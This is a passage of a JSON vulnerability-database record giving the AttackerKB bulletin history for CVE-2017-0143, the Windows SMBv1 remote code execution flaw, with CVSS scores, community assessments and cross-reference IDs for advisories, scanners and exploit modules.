"MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-11-18T06:39:05", "rev": 2, "value": 7.5, "vector": "NONE"}}, "objectVersion": "1.5", "attackerkb": {"attackerValue": 5, "exploitability": 5}, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": [], "references_categories": {}, "tags": [], "mitre_vector": {}, "last_activity": null}, "lastseen": "2020-11-18T06:39:05", "differentElements": ["references_categories"], "edition": 2}, {"bulletin": {"id": "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "vendorId": null, "hash": "01dc9ca8b7fbbb79f94752d0f03fd309", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2017-0143", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:49pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the 
EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**goodlandsecurity** at May 18, 2020 4:52pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "published": "2017-03-17T00:00:00", "modified": "2020-07-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://attackerkb.com/topics/zRrnOERfuE/cve-2017-0143", "reporter": "AttackerKB", "references": ["https://www.exploit-db.com/exploits/43970", "http://www.securityfocus.com/bid/96703", "https://www.exploit-db.com/exploits/41987", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "cvelist": 
["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-05-06T15:19:16", "history": [], "viewCount": 4, "enchantments": {"dependencies": {"modified": "2021-05-06T15:19:16", "references": [{"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"], "type": "threatpost"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": 
"openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
"MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2021-05-06T15:19:16", "rev": 2, "value": 7.5, "vector": "NONE"}}, "objectVersion": "1.5", "attackerkb": {"attackerValue": 5, "exploitability": 5}, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": [], "references_categories": {"Advisory": ["https://www.exploit-db.com/exploits/43970", "https://www.exploit-db.com/exploits/41987", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/41891", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "Canonical": ["http://www.securityfocus.com/bid/96703", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143"], "Miscellaneous": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"]}, "tags": [], "mitre_vector": {}, "last_activity": null}, "lastseen": "2021-05-06T15:19:16", "differentElements": ["last_activity", "tags"], "edition": 3}, {"bulletin": {"id": "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "vendorId": null, "hash": "f0a77ef28f32de2abf0e0871f79b1bf2", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2017-0143", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; 
Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:49pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**goodlandsecurity** at May 18, 2020 4:52pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "published": "2017-03-17T00:00:00", "modified": "2020-07-30T00:00:00", "cvss": 
{"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://attackerkb.com/topics/zRrnOERfuE/cve-2017-0143", "reporter": "AttackerKB", "references": ["https://www.exploit-db.com/exploits/43970", "http://www.securityfocus.com/bid/96703", "https://www.exploit-db.com/exploits/41987", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-07-01T15:37:35", "history": [], "viewCount": 4, "enchantments": {"dependencies": {"modified": "2021-07-01T15:37:35", "references": [{"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"], "type": "threatpost"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", 
"TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", 
"EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2021-07-01T15:37:35", "rev": 2, "value": 7.5, "vector": "NONE"}}, "objectVersion": "1.6", "attackerkb": {"attackerValue": 5, "exploitability": 5}, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": [], "references_categories": {"Advisory": ["https://www.exploit-db.com/exploits/43970", "https://www.exploit-db.com/exploits/41987", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", 
"https://www.exploit-db.com/exploits/41891", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "Canonical": ["http://www.securityfocus.com/bid/96703", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143"], "Miscellaneous": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"]}, "tags": ["easy_to_develop", "high_privilege_access", "default_configuration", "common_enterprise", "pre_auth"], "mitre_vector": {}, "last_activity": "2000-01-01T10:00:00"}, "lastseen": "2021-07-01T15:37:35", "differentElements": ["cvss2", "cvss3", "description", "last_activity"], "edition": 4}, {"bulletin": {"id": "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "vendorId": null, "hash": "ed4166a361b00934a88cd727154fabf4dc41d7f1593cc69b3a6c848b16e93ff2", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2017-0143", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:49pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; 
Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\n**goodlandsecurity** at May 18, 2020 4:52pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "published": "2017-03-17T00:00:00", "modified": "2020-07-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://attackerkb.com/topics/zRrnOERfuE/cve-2017-0143", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://www.securityfocus.com/bid/96703", "https://www.exploit-db.com/exploits/41891", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "https://www.exploit-db.com/exploits/41987", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-07-20T20:14:39", "history": [], "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142603", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142602"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", 
"RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:42030", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96704", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", 
